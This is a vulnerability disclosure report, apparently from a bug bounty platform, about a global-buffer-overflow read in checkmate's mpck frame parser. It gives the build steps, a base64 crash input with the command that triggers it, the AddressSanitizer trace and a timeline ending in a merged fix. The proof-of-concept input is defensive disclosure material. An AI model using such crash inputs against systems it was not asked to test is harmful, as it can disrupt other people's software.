Classic Buffer Overflow in sjord/checkmate

Valid

Reported on

Oct 4th 2021


Description

Good morning, I hope this message finds you well during these challenging times. Whilst testing checkmate built from commit 8e497d8, we discovered crafted input which triggers a bug in the frame parsing code, leading to a global-buffer-overflow, READ of size 4.

Proof of Concept

First...

git clone https://github.com/Sjord/checkmate

LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure

make

Second...

echo "////MA==" | base64 -d > /tmp/crash0000.fuzz

./mpck -v -x /tmp/crash0000.fuzz

Finally

==17016==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231804 at pc 0x00000030f290 bp 0x7ffffe05aeb0 sp 0x7ffffe05aea8
READ of size 4 at 0x000000231804 thread T0
    #0 0x30f28f in parseframe /root/checkmate/mpck/checkframe.c:132:19
    #1 0x30f28f in findframe /root/checkmate/mpck/checkframe.c:212:5
    #2 0x309b3a in findlastframe /root/checkmate/mpck/checkfile.c:102:9
    #3 0x309b3a in checkfile /root/checkmate/mpck/checkfile.c:144:2
    #4 0x305ffa in checkargument /root/checkmate/mpck/checkarguments.c:83:9
    #5 0x312cfb in checkarguments /root/checkmate/mpck/checkarguments.c:256:13
    #6 0x312cfb in main /root/checkmate/mpck/main.c:167:15
    #7 0x7fd0868460b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x25500d in _start (/root/checkmate/mpck/mpck+0x25500d)

0x000000231804 is located 60 bytes to the left of global variable '<string literal>' defined in 'checkframe.c:145:31' (0x231840) of size 15
  '<string literal>' is ascii string 'CRC read error'
0x000000231804 is located 0 bytes to the right of global variable 'samplerate_matrix' defined in './matrices.h:43:12' (0x2317e0) of size 36
SUMMARY: AddressSanitizer: global-buffer-overflow /root/checkmate/mpck/checkframe.c:132:19 in parseframe

Impact

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the sjord/checkmate team and are waiting to hear back 2 months ago
Sjoerd Langkemper validated this vulnerability a month ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sjoerd
a month ago

Maintainer


https://github.com/Sjord/checkmate/pull/35

Sjoerd Langkemper confirmed that a fix has been merged on 2e730a a month ago
Sjoerd Langkemper has been awarded the fix bounty
Geeknik Labs
a month ago

Researcher


LGTM, thank you for the patch!